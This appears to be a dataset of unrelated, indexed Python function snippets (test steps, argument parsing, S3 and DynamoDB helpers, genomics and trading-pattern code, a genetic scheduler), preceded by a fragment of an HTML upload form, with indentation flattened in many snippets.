<body style="margin:0;font-family:sans-serif;color:white">
<form method="POST" action="analyse" enctype="multipart/form-data">
<label style="text-align:center;position:fixed;top:0;bottom:0;width:100%;background-position:center;background-size:cover;background-image:url(https://blog.even3.com.br/wp-content/uploads/2019/04/saiba-como-e-por-que-fazer-crachas-para-eventos-1.png)">
<br /><br />
<h1>Cara-crachá</h1>
<h3 id="processing" style="display:none">Processando...</h3>
<input type="file" name="file" onchange="processing.style.display='block';this.form.submit()" style="display:none" />
</label>
</form>
</body>
'''
| 5,776 |
def step_use_log_record_configuration(context):
"""
Define log record configuration parameters.
    .. code-block:: gherkin
Given I use the log record configuration:
| property | value |
| format | |
| datefmt | |
"""
assert context.table, "REQUIRE: context.table"
context.table.require_columns(["property", "value"])
for row in context.table.rows:
property_name = row["property"]
value = row["value"]
if property_name == "format":
context.log_record_format = value
elif property_name == "datefmt":
context.log_record_datefmt = value
else:
raise KeyError("Unknown property=%s" % property_name)
| 5,777 |
def _enable_mixed_precision_graph_rewrite_base(opt, loss_scale,
use_v1_behavior):
"""Enables mixed precision. See `enable_mixed_precision_graph_rewrite`."""
opt = _wrap_optimizer(opt, loss_scale, use_v1_behavior=use_v1_behavior)
config.set_optimizer_experimental_options({'auto_mixed_precision': True})
return opt
| 5,778 |
def get_args() -> ProgramArgs:
"""
utility method that handles the argument parsing via argparse
:return: the result of using argparse to parse the command line arguments
"""
parser = argparse.ArgumentParser(
description="simple assembler/compiler for making it easier to write SHENZHEN.IO programs"
)
parser.add_argument(
'input', type=argparse.FileType(),
help="the input file to ingest"
)
parser.add_argument(
'-o', '--output',
help='the output file path', default='out.asm'
)
parser.add_argument(
'-c', '--chip', choices=shenasm.chips.list_names(), default=shenasm.chips.CHIP_TYPE_MC6000,
help='inform assembler of target chip for better diagnostics'
)
parser.add_argument(
'-v', '--verbose', action='store_true',
help='flag to cause more verbose output during execution'
)
parser.add_argument(
'--dotfile', type=str, default=None,
help='write a graphviz compatible .dot file containing the intermediate representation graph of the input'
)
return parser.parse_args()
| 5,779 |
def selection_criteria_1(users, label_of_interest):
"""
Formula for Retirement/Selection score:
    x = sum_{i=1..n}(r_i) - sum_{j=1..m}(r_j)
Where first summation contains reliability scores of users who have labeled it as the same
as the label of interest, second summation contains reliability scores of users who have
labeled it differently
Args:
users (list): List of users where each element is a tuple of the form (uid, ulabel,
f1 score)
label_of_interest (int): Label under consideration (left hand summation of formula)
Returns (int): 1 = select the subject id, 0 = don't select
"""
left_sum, right_sum = 0, 0
threshold = 2.0
for user in users:
uid, ulabel, f1_score = user
if ulabel == label_of_interest:
left_sum += f1_score
else:
right_sum += f1_score
if left_sum - right_sum >= threshold:
return 1
else:
return 0
| 5,780 |
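A small worked example of the retirement score; reliability here is the per-user F1 score and the 2.0 threshold is the one hard-coded in the function.
# Two of three users agree with the label of interest (2).
users = [(101, 2, 0.95), (102, 2, 0.90), (103, 1, 0.60)]
# left_sum = 1.85, right_sum = 0.60, difference 1.25 < 2.0 -> not selected.
assert selection_criteria_1(users, label_of_interest=2) == 0

# One more reliable, agreeing user pushes the difference over the threshold.
users.append((104, 2, 0.85))
# left_sum = 2.70, right_sum = 0.60, difference 2.10 >= 2.0 -> selected.
assert selection_criteria_1(users, label_of_interest=2) == 1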
def get_default_product_not_found(product_category_id: str) -> str:
"""Get default product.
    When invalid options are provided, the default product is returned, which happens to be unflavoured whey at 2.2 lbs.
This is PRODUCT_INFORMATION.
"""
response = requests.get(f'https://us.myprotein.com/{product_category_id}.variations')
response.raise_for_status()
dom = bs4.BeautifulSoup(response.text, 'html.parser')
# data-child-id is the attribute that contains the canonical product id
product_id_node = dom.find(attrs={'data-child-id': True})
if not product_id_node:
err_msg = f'Could not get data to resolve options to product id. Url: {response.url}'
raise ValueError(err_msg)
return cast(str, product_id_node['data-child-id'])
| 5,781 |
def tscheme_pendown():
"""Lower the pen, so that the turtle starts drawing."""
_tscheme_prep()
turtle.pendown()
| 5,782 |
def book_number_from_path(book_path: str) -> float:
"""
Parses the book number from a directory string.
Novellas will have a floating point value like "1.1" which indicates that it was the first novella
to be published between book 1 and book 2.
:param book_path: path of the currently parsed book
:return: book number
"""
num = int(re.findall(r'[0-9]{2}', book_path)[-1])
return num / 10
| 5,783 |
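Two illustrative calls, assuming directory names embed a two-digit code where, for example, "30" means book 3 and "15" means a novella between books 1 and 2; the paths themselves are made up.
assert book_number_from_path("audiobooks/Series Name 30 - Third Book") == 3.0
assert book_number_from_path("audiobooks/Series Name 15 - A Novella") == 1.5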
def intervals_split_merge(list_lab_intervals):
"""
    Merge a list of interval boundary labels.
    e.g.
    ['(2,5]', '(5,7]'] is merged into '(2,7]'
    Parameters:
    ----------
    list_lab_intervals: list, list of interval boundary label strings
    Returns:
    -------
    label_merge: the merged interval label
"""
list_labels = []
    # Walk each interval and collect the left/right boundary strings into a list
for lab in list_lab_intervals:
for s in lab.split(','):
list_labels.append(s.replace('(', '').replace(')', '').replace(']', ''))
list_lab_vals = [float(lab) for lab in list_labels]
    # Indices of the maximum and minimum boundary values
id_max_val = list_lab_vals.index(max(list_lab_vals))
id_min_val = list_lab_vals.index(min(list_lab_vals))
    # Boundary strings for the maximum and minimum values
lab_max_interval = list_labels[id_max_val]
lab_min_interval = list_labels[id_min_val]
    # If the right boundary is +Inf, use ')', otherwise use ']'
l_label = '('
if lab_max_interval == '+Inf':
r_label = ')'
else:
r_label = ']'
label_merge = l_label + lab_min_interval + ',' + lab_max_interval + r_label
return label_merge
| 5,784 |
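Two illustrative calls, one mirroring the docstring example and one exercising the open '+Inf' right boundary.
assert intervals_split_merge(['(2,5]', '(5,7]']) == '(2,7]'
assert intervals_split_merge(['(5,+Inf)', '(2,5]']) == '(2,+Inf)'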
def antique(bins, bin_method=BinMethod.category):
"""CARTOColors Antique qualitative scheme"""
return scheme('Antique', bins, bin_method)
| 5,785 |
def RegisterApiCallRouters():
"""Registers all API call routers."""
# keep-sorted start
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRobotRouter", api_call_robot_router.ApiCallRobotRouter)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterStub", api_call_router.ApiCallRouterStub)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithApprovalChecks",
api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithApprovalChecksWithRobotAccess",
api_call_router_with_approval_checks
.ApiCallRouterWithApprovalChecksWithRobotAccess)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithApprovalChecksWithoutRobotAccess",
api_call_router_with_approval_checks
.ApiCallRouterWithApprovalChecksWithoutRobotAccess)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithoutChecks",
api_call_router_without_checks.ApiCallRouterWithoutChecks)
api_call_router_registry.RegisterApiCallRouter(
"ApiLabelsRestrictedCallRouter",
api_labels_restricted_call_router.ApiLabelsRestrictedCallRouter)
api_call_router_registry.RegisterApiCallRouter("ApiRootRouter",
api_root_router.ApiRootRouter)
api_call_router_registry.RegisterApiCallRouter(
"DisabledApiCallRouter", api_call_router.DisabledApiCallRouter)
# keep-sorted end
| 5,786 |
def do_request(batch_no, req):
"""execute one request. tail the logs. wait for completion"""
tmp_src = _s3_split_url(req['input'])
cpy_dst = _s3_split_url(req['output'])
new_req = {
"src_bucket": tmp_src[0],
"src_key": tmp_src[1],
"dst_bucket": cpy_dst[0],
"dst_key": cpy_dst[1],
"digests": req["digests"]
}
delete_mismatch = req.get('delete_mismatch', False)
log.info("REQ%s data-rehash request: %s", batch_no, json.dumps(new_req, sort_keys=True, indent=4, separators=(",", ": ")))
code, response = lambdas.invoke_sync(lambdas.DATA_REHASH, Payload=new_req)
data = response['Payload'].read().decode("ascii")
if code != 0:
raise Exception("data-rehash failed to complete: %s" % (data,))
data_obj = json.loads(data)
if data_obj.get('error', None):
if "mismatch" in data_obj['error']:
session = boto3.session.Session()
s3 = session.client('s3', config=botocore.config.Config(read_timeout=300, retries={'max_attempts': 0}))
log.info("REQ%s deleting mismatchfile: Bucket=%s Key=%s", batch_no, tmp_src[0], tmp_src[1])
try:
s3.delete_object(Bucket=tmp_src[0], Key=tmp_src[1])
except Exception as delete_exc:
log.error("REQ%s delete failed", exc_info=delete_exc)
raise Exception("data-rehash returned an error: %s" % (data_obj,))
return data_obj
| 5,787 |
def bigwig_tss_targets(wig_file, tss_list, seq_coords, pool_width=1):
""" Read gene target values from a bigwig
Args:
wig_file: Bigwig filename
tss_list: list of TSS instances
seq_coords: list of (chrom,start,end) sequence coordinates
pool_width: average pool adjacent nucleotides of this width
Returns:
tss_targets:
"""
# initialize target values
tss_targets = np.zeros(len(tss_list), dtype="float16")
# open wig
wig_in = pyBigWig.open(wig_file)
# warn about missing chromosomes just once
warned_chroms = set()
# for each TSS
for tss_i in range(len(tss_list)):
tss = tss_list[tss_i]
# extract sequence coordinates
seq_chrom, seq_start, seq_end = seq_coords[tss.gene_seq]
# determine bin coordinates
tss_bin = (tss.pos - seq_start) // pool_width
bin_start = seq_start + tss_bin * pool_width
bin_end = bin_start + pool_width
# pull values
try:
tss_targets[tss_i] = np.array(
wig_in.values(seq_chrom, bin_start, bin_end), dtype="float32"
).sum()
except RuntimeError:
if seq_chrom not in warned_chroms:
print(
"WARNING: %s doesn't see %s (%s:%d-%d). Setting to all zeros. No additional warnings will be offered for %s"
% (
wig_file,
tss.identifier,
seq_chrom,
seq_start,
seq_end,
seq_chrom,
),
file=sys.stderr,
)
warned_chroms.add(seq_chrom)
# check NaN
if np.isnan(tss_targets[tss_i]):
print(
"WARNING: %s (%s:%d-%d) pulled NaN from %s. Setting to zero."
% (tss.identifier, seq_chrom, seq_start, seq_end, wig_file),
file=sys.stderr,
)
tss_targets[tss_i] = 0
# close wig file
wig_in.close()
return tss_targets
| 5,788 |
def _robot_barcode(event: Message) -> str:
"""Extracts a robot barcode from an event message.
Args:
event (Message): The event
Returns:
str: robot barcode
"""
return str(
next(
subject["friendly_name"] # type: ignore
for subject in event.message["event"]["subjects"] # type: ignore
if subject["role_type"] == "robot" # type: ignore
)
)
| 5,789 |
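A small illustrative call; the payload shape (subjects carrying role_type and friendly_name) is taken from the function body, and types.SimpleNamespace stands in for the Message type.
from types import SimpleNamespace

event = SimpleNamespace(message={
    "event": {
        "subjects": [
            {"role_type": "sample", "friendly_name": "SAMPLE-1"},
            {"role_type": "robot", "friendly_name": "BKRB0001"},
        ]
    }
})
assert _robot_barcode(event) == "BKRB0001"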
def build_dist(srcdir, destdir='.', build_type='bdist_egg'):
"""
Builds a distribution using the specified source directory and places
it in the specified destination directory.
srcdir: str
Source directory for the distribution to be built.
destdir: str
Directory where the built distribution file will be placed.
build_type: str
The type of distribution to be built. Default is 'bdist_egg'.
"""
startdir = os.getcwd()
destdir = os.path.abspath(os.path.expanduser(destdir)).replace('\\','/')
srcdir = os.path.abspath(os.path.expanduser(srcdir)).replace('\\','/')
setupname = os.path.join(srcdir, 'setup.py')
if not has_setuptools():
setupname = make_new_setupfile(setupname)
dirfiles = set(os.listdir(destdir))
print "building distribution in %s" % srcdir
cmd = [sys.executable.replace('\\','/'),
os.path.basename(setupname),
]
cmd.extend(build_type.split(' '))
cmd.extend(['-d', destdir])
os.chdir(srcdir)
# FIXME: fabric barfs when running this remotely due to some unicode
# output that it can't handle, so we first save the output to
# a file with unicode stripped out
out = codecs.open('_build_.out', 'wb',
encoding='ascii', errors='replace')
    print('running command: %s' % ' '.join(cmd))
try:
p = subprocess.Popen(' '.join(cmd),
stdout=out, stderr=subprocess.STDOUT,
shell=True)
p.wait()
finally:
out.close()
with open('_build_.out', 'r') as f:
        print(f.read())
os.chdir(startdir)
newfiles = set(os.listdir(destdir)) - dirfiles
if len(newfiles) != 1:
raise RuntimeError("expected one new file in in destination directory but found %s" %
list(newfiles))
if p.returncode != 0:
raise RuntimeError("problem building distribution in %s. (return code = %s)" %
(srcdir, p.returncode))
distfile = os.path.join(destdir, newfiles.pop())
    print('new distribution file is %s' % distfile)
return distfile
| 5,790 |
def check_thirteen_fd(fds: List[Union[BI, FakeBI]]) -> str:
"""识别十三段形态
:param fds: list
由远及近的十三段形态
:return: str
"""
v = Signals.Other.value
if len(fds) != 13:
return v
direction = fds[-1].direction
fd1, fd2, fd3, fd4, fd5, fd6, fd7, fd8, fd9, fd10, fd11, fd12, fd13 = fds
max_high = max([x.high for x in fds])
min_low = min([x.low for x in fds])
if direction == Direction.Down:
if min_low == fd13.low and max_high == fd1.high:
            # aAbBc-style bottom divergence: fd2-fd6 form A, fd8-fd12 form B
if min(fd2.high, fd4.high, fd6.high) > max(fd2.low, fd4.low, fd6.low) > fd8.high \
and min(fd8.high, fd10.high, fd12.high) > max(fd8.low, fd10.low, fd12.low) \
and min(fd2.low, fd4.low, fd6.low) > max(fd8.high, fd10.high, fd12.high) \
and fd13.power < fd7.power:
v = Signals.LA0.value
            # ABC-style bottom divergence, A5B3C5
if fd5.low < min(fd1.low, fd3.low) and fd9.high > max(fd11.high, fd13.high) \
and fd8.high > fd6.low and fd1.high - fd5.low > fd9.high - fd13.low:
v = Signals.LA0.value
if fd13.power < max(fd11.power, fd9.power):
v = Signals.LB0.value
            # ABC-style bottom divergence, A3B5C5
if fd3.low < min(fd1.low, fd5.low) and fd9.high > max(fd11.high, fd13.high) \
and min(fd4.high, fd6.high, fd8.high) > max(fd4.low, fd6.low, fd8.low) \
and fd1.high - fd3.low > fd9.high - fd13.low:
v = Signals.LA0.value
if fd13.power < max(fd11.power, fd9.power):
v = Signals.LB0.value
            # ABC-style bottom divergence, A5B5C3
if fd5.low < min(fd1.low, fd3.low) and fd11.high > max(fd9.high, fd13.high) \
and min(fd6.high, fd8.high, fd10.high) > max(fd6.low, fd8.low, fd10.low) \
and fd1.high - fd5.low > fd11.high - fd13.low:
v = Signals.LA0.value
if fd13.power < fd11.power:
v = Signals.LB0.value
elif direction == Direction.Up:
if max_high == fd13.high and min_low == fd1.low:
            # aAbBC-style top divergence: fd2-fd6 form A, fd8-fd12 form B
if fd8.low > min(fd2.high, fd4.high, fd6.high) >= max(fd2.low, fd4.low, fd6.low) \
and min(fd8.high, fd10.high, fd12.high) >= max(fd8.low, fd10.low, fd12.low) \
and max(fd2.high, fd4.high, fd6.high) < min(fd8.low, fd10.low, fd12.low) \
and fd13.power < fd7.power:
v = Signals.SA0.value
            # ABC-style top divergence, A5B3C5
if fd5.high > max(fd3.high, fd1.high) and fd9.low < min(fd11.low, fd13.low) \
and fd8.low < fd6.high and fd5.high - fd1.low > fd13.high - fd9.low:
v = Signals.SA0.value
                # Top divergence inside C, forming a double top divergence
if fd13.power < max(fd11.power, fd9.power):
v = Signals.SB0.value
            # ABC-style top divergence, A3B5C5
if fd3.high > max(fd5.high, fd1.high) and fd9.low < min(fd11.low, fd13.low) \
and min(fd4.high, fd6.high, fd8.high) > max(fd4.low, fd6.low, fd8.low) \
and fd3.high - fd1.low > fd13.high - fd9.low:
v = Signals.SA0.value
                # Top divergence inside C, forming a double top divergence
if fd13.power < max(fd11.power, fd9.power):
v = Signals.SB0.value
            # ABC-style top divergence, A5B5C3
if fd5.high > max(fd3.high, fd1.high) and fd11.low < min(fd9.low, fd13.low) \
and min(fd6.high, fd8.high, fd10.high) > max(fd6.low, fd8.low, fd10.low) \
and fd5.high - fd1.low > fd13.high - fd11.low:
v = Signals.SA0.value
                # Top divergence inside C, forming a double top divergence
if fd13.power < fd11.power:
v = Signals.SB0.value
else:
raise ValueError("direction 的取值错误")
return v
| 5,791 |
def set_process_tracking(template: str, channels: List[str]) -> str:
"""This function replaces the template placeholder for the process tracking with the correct process tracking.
Args:
template: The template to be modified.
channels: The list of channels to be used.
Returns:
The modified template.
"""
tracking = ""
for channel in channels:
tracking += " ULong64_t {ch}_processed = 0;\n".format(ch=channel)
tracking += " std::mutex {ch}_bar_mutex;\n".format(ch=channel)
tracking += " auto c_{ch} = {ch}_df_final.Count();\n".format(ch=channel)
tracking += " c_{ch}.OnPartialResultSlot(quantile, [&{ch}_bar_mutex, &{ch}_processed, &quantile](unsigned int /*slot*/, ULong64_t /*_c*/) {{".format(
ch=channel
)
tracking += (
"\n std::lock_guard<std::mutex> lg({ch}_bar_mutex);\n".format(
ch=channel
)
)
tracking += " {ch}_processed += quantile;\n".format(ch=channel)
tracking += ' Logger::get("main - {ch} Channel")->info("{{}} Events processed ...", {ch}_processed);\n'.format(
ch=channel
)
tracking += " });\n"
return template.replace("{PROGRESS_CALLBACK}", tracking)
| 5,792 |
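A tiny illustrative call; the template string and channel names are made up, and the generated text is the per-channel C++ progress-tracking block described above.
template = "int main() {\n{PROGRESS_CALLBACK}\n  return 0;\n}"
filled = set_process_tracking(template, ["mt", "et"])
# The placeholder is replaced by one Count()/OnPartialResultSlot block per channel.
assert "{PROGRESS_CALLBACK}" not in filled
assert "mt_processed" in filled and "et_processed" in filled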
def solve(instance: Instance) -> InstanceSolution:
"""Solves the P||Cmax problem by using a genetic algorithm.
:param instance: valid problem instance
:return: generated solution of a given problem instance
"""
generations = 512
population_size = 128
best_specimens_number = 32
generator = solution_generator(instance, population_size, best_specimens_number)
best_solution = GeneticSolution(instance, [0 for _ in range(len(instance.tasks_durations))])
for _, solution in zip(range(generations), generator):
best_solution = min(best_solution, solution, key=lambda x: x.total_time)
return best_solution.to_instance_solution()
| 5,793 |
def cube_disp_data(self,vmin=None,vmax=None,cmap=pylab.cm.hot,var=False):
"""
Display the datacube as the stack of all its spectra
@param vmin: low cut in the image for the display (if None, it is 'smartly' computed)
@param vmax: high cut in the image for the display (if None, it is 'smartly' computed)
@param var: Variance flag. If set to True, the variance slice is displayed.
@param cmap: Colormap in pylab syntax
"""
if var:
data = self.var
else:
data = self.data
med = float(num.median(num.ravel(data)))
disp = float(num.sqrt(num.median((num.ravel(data)-med)**2)))
if vmin is None:
vmin = med - 3*disp
if vmax is None:
vmax = med + 10*disp
extent = [self.lstart,self.lend,-1./2.,self.nlens-1./2.]
        pylab.imshow(num.transpose(data),vmin=vmin,vmax=vmax,extent=extent,
interpolation='nearest',aspect='auto')
| 5,794 |
def payee_transaction():
"""Last transaction for the given payee."""
entry = g.ledger.attributes.payee_transaction(request.args.get("payee"))
return serialise(entry)
| 5,795 |
def datasheet_check(part):
"""Datasheet check"""
if part.datasheet == "":
return # Blank datasheet ok
assert part.datasheet.startswith("http"), "'{}' is an invalid URL".format(part.datasheet)
code = check_ds_link(part.datasheet)
assert code in (200,301,302), "link '{}' BROKEN, error code '{}'".format(part.datasheet, code)
| 5,796 |
def represent(element: Element) -> str:
"""Represent the regular expression as a string pattern."""
return _Representer().visit(element)
| 5,797 |
def read_dynamo_table(gc, name, read_throughput=None, splits=None):
"""
Reads a Dynamo table as a Glue DynamicFrame.
:param awsglue.context.GlueContext gc: The GlueContext
:param str name: The name of the Dynamo table
:param str read_throughput: Optional read throughput - supports values from "0.1" to "1.5", inclusive.
:param str splits: Optional number of input splits - defaults to the SparkContext default parallelism.
:rtype: awsglue.dynamicframe.DynamicFrame
"""
connection_options = {
'dynamodb.input.tableName': name,
'dynamodb.splits': str(splits or gc.spark_session.sparkContext.defaultParallelism)
}
if read_throughput:
connection_options['dynamodb.throughput.read.percent'] = str(read_throughput)
return gc.create_dynamic_frame_from_options(connection_type='dynamodb', connection_options=connection_options)
| 5,798 |
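A hedged sketch of calling this helper inside an AWS Glue job; the table name and tuning values are placeholders and the code only runs in a Glue environment.
from awsglue.context import GlueContext
from pyspark.context import SparkContext

glue_context = GlueContext(SparkContext.getOrCreate())

# Read with half of the table's provisioned read capacity and 8 input splits.
frame = read_dynamo_table(glue_context, "my-dynamo-table",
                          read_throughput="0.5", splits=8)
print(frame.count())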
def convert_to_bytes(text):
"""
Converts `text` to bytes (if it's not already).
Used when generating tfrecords. More specifically, in function call `tf.train.BytesList(value=[<bytes1>, <bytes2>, ...])`
"""
if six.PY2:
return convert_to_str(text) # In python2, str is byte
elif six.PY3:
if isinstance(text, bytes):
return text
else:
return convert_to_unicode(text).encode('utf-8')
else:
raise ValueError("Not running on Python2 or Python 3?")
| 5,799 |